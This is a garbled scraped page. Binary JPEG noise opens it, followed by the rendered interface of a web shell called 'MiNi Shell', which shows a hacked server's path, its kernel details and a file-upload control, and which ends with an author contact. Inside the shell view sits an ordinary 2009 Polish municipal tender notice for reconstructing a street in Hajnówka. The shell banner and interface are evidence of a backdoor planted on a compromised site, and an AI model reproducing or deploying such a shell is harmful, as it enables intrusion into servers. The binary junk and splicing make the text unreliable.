JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090514/148866-N-2009.html

<p class="kh_header"><b>Hajnówka: Przebudowa  ul. Kolejowej w  Hajnówce</b><br>
<b>Numer ogłoszenia: 148866 - 2009; data zamieszczenia: 14.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Hajnówka , ul. Aleksego Zina 1, 17-200 Hajnówka, woj. podlaskie, tel. 085 6822180, 6822875, faks 085 6822994.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.hajnowka.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.hajnowka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  ul. Kolejowej w  Hajnówce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia  jest  realizacja  projektu  pn: Przebudowa  ul. Kolejowej   
      w  Hajnówce polegająca  na:
     a. budowie  kanalizacji  deszczowej  O 315 PCV  w  ul. Kolejowej  o  dł. 439,50 mb. 
     b. wykonaniu  jezdni  dla  ruchu  KR1 i KR2  (warstwa  odsączająca, podbudowa, warstwa wiążąca  i  ścieralna) :
         - długość  738,22 mb,
         - szerokość  jezdni  5,0 m,
     c. wykonaniu  jedno-  i  dwustronnego  chodnika  o  szerokości  1,75 m  wraz  z  azylami  dla  pieszych  i  wjazdami,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 45.23.21.30-2, 45.23.32.22-1.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 30.10.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Warunkiem  złożenia  oferty  w  postępowaniu  o  udzielenie  zamówienia  publicznego  jest wniesienie  wadium  w  wysokości  25 000,00 zł  (słownie: dwadzieścia  pięć  tysięcy  złotych).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O  udzielenie  zamówienia  mogą  ubiegać  się  oferenci, którzy :   
1. Spełniają  warunki  określone  w  art. 22  ust. 1  ustawy z  dnia  29 stycznia  2004 roku  Prawo zamówień  publicznych  (Dz. U. z 2007 r. Nr 223, poz. 1655 j.t.  wraz  z  póź. zmianami),
2. Nie  podlegają  wykluczeniu  z  postępowania  o  udzielenie  zamówienia  na  podstawie art. 24  ust. 1 i  2  ustawy z  dnia  29 stycznia  2004 roku  Prawo  zamówień  publicznych  (Dz. U. z 2007 r. Nr 223, poz. 1655 j.t.  wraz  z  późniejszymi  zmianami),
3. Spełniają  warunki  określone  w  SIWZ, a  w  szczególności:
    -  udzielą  gwarancji  na  okres  minimum  36 miesięcy,    
    -  zrealizują  zamówienie  zgodnie  z  harmonogramem  wykonania  zadania  stanowiącym załącznik  SIWZ.        
Ocena  spełniania  w/w  warunków  dokonana  zostanie  zgodnie  z  formułą  spełnia - nie  spełnia  w  oparciu  o  informacje  zawarte  w  dokumentach  i  oświadczeniach  wyszczególnionych w  pkt  VI  niniejszej  SIWZ. Z  treści  załączonych  dokumentów  musi  wynikać  jednoznacznie,   iż  w/w  warunki  wykonawca  spełnił. 
Niezłożeni  lub  złożenie  w  niewłaściwej  formie  któregokolwiek  z  oświadczeń  wymienionych  w  rozdziale  V  i  VI  spowoduje  wykluczenie  oferenta  z  udziału  w  postępowaniu  i  odrzucenie  oferty..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Wypełniony  formularz  ofertowy  (wg  załącznika  Nr  1  do  SIWZ).
  2. Oświadczenie  o  spełnieniu  warunków  określonych  w  art.  22  ust. 1  i  art. 24  ust. 1 i  2  ustawy  z  dnia  29 stycznia  2004 roku  Prawo  zamówień  publicznych  (Dz. U. z  2007 roku Nr 223, poz. 1655 j.t.  wraz  z  późniejszymi  zmianami)  (wg  załącznika  Nr  2  do  SIWZ).
  3. Wypełnione  kosztorysy  (wg  załącznika  Nr  8  i  Nr 9  do  SIWZ).
  4. Aktualny  odpis  z  właściwego  rejestru  lub  aktualne  zaświadczenie  o  wpisie  do  ewidencji działalności  gospodarczej, wystawione  nie  wcześniej  niż  6 miesięcy  przed  upływem terminu  składania  ofert.
  5. Aktualne  zaświadczenie  właściwego  naczelnika  urzędu  skarbowego  potwierdzające, że  Wykonawca  nie  zalega  z  opłacaniem  podatków  lub  zaświadczenie  stwierdzające uzyskanie  przewidzianego  prawem  zwolnienia, odroczenia  lub  rozłożenia na  raty  zaległych  płatności  lub  wstrzymania w  całości  wykonania  decyzji  właściwego  organu  -  wystawione  nie  wcześniej  niż  3 miesiące  przed  upływem  terminu  składania  ofert.
  6. Aktualne  zaświadczenie  z  właściwego  oddziału  ZUS  potwierdzające, że  Wykonawca  nie zalega  z  opłacaniem  składek  na  ubezpieczenie  lub  społeczne  lub  zaświadczenie  stwierdzające  uzyskanie  przewidzianego  prawem  zwolnienia, odroczenia  lub  rozłożenia na raty  zaległych  płatności  lub  wstrzymania w  całości  wykonania  decyzji  właściwego  organu    
      -  wystawione nie  wcześniej  niż  3 miesiące  przed  upływem  terminu  składania  ofert.

  7. Aktualna  informacja  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24 ust. 1  pkt  4-8  ustawy  z  dnia  29 stycznia  2004 roku  prawo  zamówień  publicznych  (Dz. U. z  2007 r. Nr 223, poz. 1655 j.t.  wraz  z  późniejszymi  zmianami), wystawiona  nie wcześniej  niż  6 miesięcy  przed  upływem  terminu  składania  ofert.
  8. Aktualna  informacja  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art. 24 ust. 1  pkt  9  ustawy  z  dnia  29 stycznia  2004 roku  prawo  zamówień  publicznych  (Dz. U. z  2007 r. Nr 223, poz. 1655 j.t.  wraz  z  późniejszymi  zmianami), wystawiona  nie  wcześniej  niż  6 miesięcy  przed  upływem  terminu  składania  ofert.
  9. Wykaz  wykonanych  robót  budowlanych  w  okresie  ostatnich  pięciu  lat  (co  najmniej trzech)  przed  dniem  wszczęcia  postępowania  o  udzielenie  zamówienia, a  jeżeli  okres prowadzenia  działalności  jest  krótszy  -  w  tym  okresie, odpowiadających  swoim  rodzajem  i  wartością  robotom  budowlanym  stanowiącym  przedmiot  zamówienia, z  podaniem  ich   wartości  oraz  daty  i  miejsca  wykonania  wraz  z  dokumentami  potwierdzającymi, że  roboty  
      te  zostały  wykonane  należycie  (referencje)  wg  załącznika  Nr  3  do  SIWZ.  
10. Wykaz  niezbędnych  do  wykonania  zamówienia  narzędzi  i  urządzeń, którymi  dysponuje  lub  będzie  dysponował  Wykonawca  wg. załącznika  Nr  4  do  SIWZ.  
11. Pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  niezbędnych  do  wykonania   zamówienia  narzędzi  i  urządzeń, jeżeli  w  wykazie, o  którym  mowa  w  pkt  10, Wykonawca wskazał  narzędzia  i  urządzenia, którymi  będzie  dysponował.
12. Wykaz  osób, którymi  dysponuje  lub  będzie  dysponował  Wykonawca  i  które  będą uczestniczyć  w  wykonywaniu  zamówienia, wraz  z  informacjami  na  temat  ich kwalifikacji   zawodowych, doświadczenia  i  wykształcenia, niezbędnych  do  wy­konania  zamówienia, a  także  zakresu  wykonywanych  przez  nich  czynności  wg  załącznika  Nr 5 do  SIWZ.  
13. Pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  osób  zdolnych  do  wykonania  zamówienia, jeżeli  w  wykazie, o  którym  mowa  w  pkt  12, Wykonawca  wskazał  osoby, którymi  będzie  dysponował.
14. Informację  banku  lub  spółdzielczej  kasy  oszczędnościowo - kredytowej, w  których  oferent posiada  rachunek, potwierdzającej  wysokość  posiadanych  środków  finansowych  lub zdolność  kredytową  oferenta, wystawioną  nie  wcześniej  niż  3 miesiące  przed  upływem  terminu  składania  ofert. 
15. Polisę, a  w  przypadku  jej  braku  inny  dokument  potwierdzający, że  Wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności.  
16. Dowód  wniesienia  wadium.
17. Wykaz  tych  części  zamówienia, których  wykonanie  oferent  zamierza  powierzyć  podwykonawcom.  
Brak  jakiegokolwiek  z  dokumentów  wymienionych  w  rozdziale  VI  lub  złożenie  dokumentu w  niewłaściwej  formie  (np. niedoświadczone  przez  wykonawcę  za  zgodność  z  oryginałem  kopie  lub  odpisy)  spowoduje  wykluczenie  oferenta  z  udziału  w  postępowaniu  i  odrzucenie  oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 90</li>
<li>2 - Gwarancja (ponad 36 miesięcy) - 10</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.hajnowka.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1
tel. (085) 682 2875,682 6443 fax. (085) 682 2994,.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.06.2009 godzina 10:00, miejsce: Urząd  Miasta  Hajnówka, 17 - 200 Hajnówka, ul. Aleksego  Zina  1,
 pok. Nr  219  -  sekretariat  Urzędu..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com